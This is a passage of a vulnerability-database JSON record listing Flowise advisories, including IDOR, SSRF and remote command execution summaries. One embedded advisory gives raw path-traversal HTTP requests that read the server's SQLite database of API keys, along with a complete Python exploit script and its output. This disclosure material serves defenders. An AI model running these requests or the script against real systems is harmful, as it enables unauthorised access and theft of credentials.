"vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "GHSA-jc5m-wrp2-qq38" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ksmv-s6c9-t7ap" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66643?format=api", "vulnerability_id": "VCID-m3j3-4u39-euht", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30823", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09992", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30823" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30823", "reference_id": "CVE-2026-30823", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30823" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13", "reference_id": "flowise%403.0.13", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:04Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13" }, { "reference_url": "https://github.com/advisories/GHSA-cwc3-p92j-g7qm", "reference_id": "GHSA-cwc3-p92j-g7qm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cwc3-p92j-g7qm" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm", "reference_id": "GHSA-cwc3-p92j-g7qm", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:04Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "CVE-2026-30823", "GHSA-cwc3-p92j-g7qm" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-m3j3-4u39-euht" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/100879?format=api", "vulnerability_id": "VCID-n77p-4nu7-2yb4", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, a Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/v1/fetch-links endpoint of the Flowise application. This vulnerability allows an attacker to use the Flowise server as a proxy to access internal network web services and explore their link structures. This issue has been patched in version 3.0.6.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-59527", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.4445", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-59527" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59527", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59527" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6", "reference_id": "flowise%403.0.6", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6" }, { "reference_url": "https://github.com/advisories/GHSA-hr92-4q35-4j3m", "reference_id": "GHSA-hr92-4q35-4j3m", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-hr92-4q35-4j3m" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hr92-4q35-4j3m", "reference_id": "GHSA-hr92-4q35-4j3m", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hr92-4q35-4j3m" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24", "reference_id": "index.ts#L6-L24", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18", "reference_id": "index.ts#L8-L18", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478", "reference_id": "utils.ts#L474-L478", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "aliases": [ "CVE-2025-59527", "GHSA-hr92-4q35-4j3m" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-n77p-4nu7-2yb4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360553?format=api", "vulnerability_id": "VCID-pg5c-6y4s-h3cq", "summary": "Flowise has an Arbitrary File Read\n### Summary\nAn arbitrary file read vulnerability in the `chatId` parameter supplied to both the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints allows unauthenticated users to read unintended files on the local filesystem. In the default Flowise configuration this allows reading of the local sqlite db and subsequent compromise of all database content.\n\n### Details\nBoth the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints accept the `chatId` parameter and pass this to a subsequent call to streamStorageFile().\n\n\n```\nconst chatflowId = req.query.chatflowId as string\nconst chatId = req.query.chatId as string\nconst fileName = req.query.fileName as string\n\n...\n const fileStream = await streamStorageFile(chatflowId, chatId, fileName, orgId)\n```\n\nWhile streamStorageFile validates that the chatflowId is a UUID and strips traversal sequences from fileName, it performs no validation of chatId.\n\n\n```\n // Validate chatflowId\n if (!chatflowId || !isValidUUID(chatflowId)) {\n throw new Error('Invalid chatflowId format - must be a valid UUID')\n }\n\n // Check for path traversal attempts\n if (isPathTraversal(chatflowId)) {\n throw new Error('Invalid path characters detected in chatflowId')\n }\n...\n const sanitizedFilename = sanitize(fileName)\n...\n\tconst filePath = path.join(getStoragePath(), orgId, chatflowId, chatId, sanitizedFilename)\n```\n\nThere is validation that the resulting filePath is restricted to the `/root/.flowise/storage` directory.\n\n```\nif (!filePath.startsWith(getStoragePath())) throw new Error(`Invalid file path`)\n```\n\nHowever, if the file is not found in the specified path, the orgId value is removed from the filePath and reattempted.\n\n```\n if (fs.existsSync(filePath)) {\n return fs.createReadStream(filePath)\n } else {\n // Fallback: Check if file exists without orgId\n const fallbackPath = path.join(getStoragePath(), chatflowId, chatId, sanitizedFilename)\n\n if (fs.existsSync(fallbackPath)) {\n // Create directory if it doesn't exist\n const dir = path.dirname(filePath)\n if (!fs.existsSync(dir)) {\n fs.mkdirSync(dir, { recursive: true })\n }\n\n // Copy file to correct location with orgId\n fs.copyFileSync(fallbackPath, filePath)\n\n // Delete the old file\n fs.unlinkSync(fallbackPath)\n\n // Clean up empty directories recursively\n _cleanEmptyLocalFolders(path.join(getStoragePath(), chatflowId, chatId))\n\n return fs.createReadStream(filePath)\n\n```\n\nAs this fallback path is read after the `/root/.flowise/storage` check, this allows an additional level of traversal up to `/root/.flowise/`. As a result, this allows reading of `/root/.flowise/database.sqlite`, which contains all database content in the default Flowise configuration.\n\nREQUEST\n```\nGET /api/v1/get-upload-file?chatflowId=188903b1-d06d-4f93-9415-400015b87146&chatId=../.././&fileName=database.sqlite HTTP/1.1\nHost: 127.0.0.1:3000\n\n```\n\nRESPONSE\n```\nHTTP/1.1 200 OK\nVary: Origin\nAccess-Control-Allow-Credentials: true\nContent-Disposition: attachment; filename=\"database.sqlite\"\nDate: Tue, 22 Jul 2025 06:43:51 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\nContent-Length: 385024\n\nSQLite format 3�\u0010�\u0001\u0001�@ ���6���^���A���\u0015���Õ���\u0004�����������\u0001�����������������������������������6�.r¢\u0005\u000fö�\u0006\u000fÚ����Z\u000fû\u000fì\u000fñ\u000fæ\u000fà\u000fÚ\u000fÛ\t\u000e\b�\u0007Ï\u0001l\u0007\u0007\n\u0005Í\u0005\u0004\u0004S\u0003=\u0004*\u0001'\u0001'���������������������������������������������������������������������������������������������������������������������������������������������;,\u0006\u0017O)\u0001�indexsqlite_autoindex_docume\n...\n```\n\nSimilarly, for `/api/v1/openai-assistants-file/download`:\nREQUEST\n```\nPOST /api/v1/openai-assistants-file/download HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nContent-Length: 100\n\n{\"chatflowId\":\"c5c63474-e757-4fca-a504-d54e84c309bb\",\"chatId\":\"/../..\",\"fileName\":\"database.sqlite\"}\n```\nRESPONSE\n```\nHTTP/1.1 200 OK\nVary: Origin\nAccess-Control-Allow-Credentials: true\nContent-Disposition: attachment; filename=\"database.sqlite\"\nDate: Tue, 22 Jul 2025 08:55:25 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\nContent-Length: 385024\n\nSQLite format 3�\u0010�\u0001\u0001�@ ���6���^���A���\u0015���Õ���\u0004�����������\u0001�����������������������������������6�.r¢\u0005\u000fö�\u0006\u000fÚ����Z\u000fû\u000fì\u000fñ\u000fæ\u000fà\u000fÚ\u000fÛ\t\n...\n```\n\nThis includes all API keys used by the application (apiKey table), which can be used to gain administrative access.\n\nAs the fallback logic attempts to move the file to the initially checked directory, this results in the server permanently being unable to make new read or write operations until the file is moved and the server is restarted.\n\nInteraction with these endpoints requires knowledge of a valid `chatflowId`. As a UUID, this is inherently unguessable. However, the `/api/v1/vector/upsert/` endpoint can be used without a chatflowId, defaulting to the first ID available. This endpoint returns a verbose error when receiving a malformed filename, revealing the full internal file path and the associated `chatflowId`.\n\n\nREQUEST\n```\nPOST /api/v1/vector/upsert/ HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Length: 172\nConnection: keep-alive\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"files\"; filename=\"?\"\nContent-Type: text/plain\n\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n```\nRESPONSE\n```\nHTTP/1.1 500 Internal Server Error\nVary: Origin\nAccess-Control-Allow-Credentials: true\nContent-Type: application/json; charset=utf-8\nContent-Length: 240\nETag: W/\"f0-khSyqlT3NYLMJGjdchTl6Iwqe4U\"\nDate: Tue, 22 Jul 2025 08:14:20 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\n\n{\"statusCode\":500,\"success\":false,\"message\":\"Error: vectorsService.upsertVector - EISDIR: illegal operation on a directory, open '/root/.flowise/storage/07b5d2bd-9b5c-4de3-b234-4fe4357051c9/188903b1-d06d-4f93-9415-400015b87146'\",\"stack\":{}}\n```\nIn this case the UUID is revealed as `188903b1-d06d-4f93-9415-400015b87146`, which can then be used to exploit the file read vulnerability.\n\n### PoC\n\nRun Flowise:\n```\ndocker run --rm -p 3000:3000 flowiseai/flowise\n```\nComplete install & create a Chatflow:\n<img width=\"575\" height=\"299\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1a34e809-b9b3-48a1-93b4-8dafccf87e3b\" />\n\nSave this script to `read.py`:\n```\nimport argparse\nimport re\nimport requests\n\ndef read_file(url, file_path, proxy):\n base_url = url\n proxies = {'http': proxy, 'https': proxy} if proxy else None\n\n print(f\">> starting exploit against {base_url}\")\n if proxy:\n print(f\">> using proxy: {proxy}\")\n\n try:\n print(\"[*] step 1: leaking chatflowid\")\n initial_headers = {}\n files = {'files': ('?', 'asdf', 'text/plain')}\n response = requests.post(f\"{base_url}/api/v1/vector/upsert/\", files=files, headers=initial_headers, timeout=10, proxies=proxies)\n chatflow_id_matches = re.findall(r'([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})', response.json().get(\"message\", \"\"))\n if len(chatflow_id_matches) < 2:\n print(\"[-] failed to leak chatflowid.\")\n return\n chatflow_id = chatflow_id_matches[1]\n print(f\"[+] got chatflowid: {chatflow_id}\")\n\n print(f\"[*] step 2: reading file: {file_path}\")\n internal_headers = {'x-request-from': 'internal'}\n params = {'chatflowId': chatflow_id, 'chatId': '/../../', 'fileName': file_path}\n response = requests.get(f\"{base_url}/api/v1/get-upload-file\", params=params, headers=internal_headers, timeout=10, proxies=proxies)\n \n if response.status_code != 200:\n print(f\"[-] failed to read file (status: {response.status_code}).\")\n print(response.text)\n return\n \n file_content = response.text\n print(f\"[+] successfully read file ({len(response.content)} bytes).\")\n print(\"\\n--- file content ---\")\n print(file_content)\n print(\"--------------------\\n\")\n\n except requests.exceptions.RequestException as e:\n print(f\"\\n[-] an unexpected error occurred: {e}\")\n except Exception as e:\n print(f\"\\n[-] an unexpected error occurred: {e}\")\n return\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Read arbitrary files\")\n parser.add_argument(\"-u\", \"--url\", type=str, required=True, help=\"target base url (e.g., http://127.0.0.1:3000)\")\n parser.add_argument(\"-f\", \"--file\", type=str, required=True, help=\"path of the file to read on the server (e.g., database.sqlite)\")\n parser.add_argument(\"-x\", \"--proxy\", type=str, help=\"proxy to use (e.g., http://127.0.0.1:8080)\")\n\n args = parser.parse_args()\n read_file(args.url, args.file, args.proxy)\n```\n\nRun the script against `http://127.0.0.1:3000`:\n```\npython3 read.py -u http://127.0.0.1:3000 -f database.sqlite\n>> starting exploit against http://127.0.0.1:3000\n[*] step 1: leaking chatflowid\n[+] got chatflowid: c5c63474-e757-4fca-a504-d54e84c309bb\n[*] step 2: reading file: database.sqlite\n[+] successfully read file (385024 bytes).\n\n--- file content ---\nÕÇêS=*'';,O)indexsqlite_autoindex...\n\n```\n\n\n### Impact\n\nThis allows any unauthenticated user to extract all database content from a default installation of Flowise. This includes API keys, which can be used to gain administrative access.", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf" }, { "reference_url": "https://github.com/advisories/GHSA-99pg-hqvx-r4gf", "reference_id": "GHSA-99pg-hqvx-r4gf", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-99pg-hqvx-r4gf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "aliases": [ "GHSA-99pg-hqvx-r4gf" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pg5c-6y4s-h3cq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81102?format=api", "vulnerability_id": "VCID-pzza-9xq9-a7de", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise is vulnerable to a critical unauthenticated remote command execution (RCE) vulnerability. It can be exploited via a parameter override bypass using the FILE-STORAGE:: keyword combined with a NODE_OPTIONS environment variable injection. This allows for the execution of arbitrary system commands with root privileges within the containerized Flowise instance, requiring only a single HTTP request and no authentication or knowledge of the instance. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41268", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0139", "scoring_system": "epss", "scoring_elements": "0.80777", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41268" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41268", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41268" }, { "reference_url": "https://github.com/advisories/GHSA-cvrr-qhgw-2mm6", "reference_id": "GHSA-cvrr-qhgw-2mm6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cvrr-qhgw-2mm6" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cvrr-qhgw-2mm6", "reference_id": "GHSA-cvrr-qhgw-2mm6", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:19:30Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cvrr-qhgw-2mm6" } ], "fixed_packages": [ { "url": 